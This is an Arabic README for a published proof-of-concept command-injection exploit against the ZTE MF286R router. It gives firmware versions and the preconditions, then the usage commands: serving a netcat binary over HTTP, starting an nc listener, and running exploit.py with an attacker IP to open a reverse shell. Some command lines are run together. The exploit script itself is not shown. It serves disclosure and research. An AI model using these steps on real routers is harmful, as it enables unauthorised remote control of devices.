
إثبات مفهوم لثغرة حقن الأوامر التي تؤثر على راوتر ZTE MF286R، بما في ذلك استغلال RCE.
تفاصيل البرنامج الثابت:
wa_inner_version: BD_POSTEMF286RMODULEV1.0.0B12
cr_version: CR_ITPOSTEMF286RV1.0.0B10
pip install requests)الثغرة عبارة عن حقن أوامر مشترك بين الملف الثنائي zte_net_link_detect ومعالج WATCH_DOG_SWITCH في الملف الثنائي لخادم الويب goahead.
لاحظ أنه يمكن استغلال الثغرة فقط عندما يكون الموجّه متصلاً بشبكة WAN أو متصلاً بالإنترنت عبر بطاقة SIM. (يجب أن تكون قيمة مفتاح "ppp_status" هي "ppp_connected" أو "ipv4_ipv6_connected" أو "ipv6_connected").
فكرة الاستغلال هي تنزيل الملف الثنائي الثابت لـ netcat من خادم http ثم فتح قشرة عكسية (reverse shell) به. ملاحظة: إصدار netcat المضمّن في هذا المجلد هو big endian.
python3 -m http.server 80809999 باستخدام nc -lvp 9999python3 exploit.py http://<router> <admin_password> <attacker_ip, es: 192.168.1.101>تم الإبلاغ عن هذه الثغرة بواسطة Andrea Maugeri في سبتمبر 2022. https://support.zte.com.cn/support/news/NewsDetail.aspx?newsId=1028664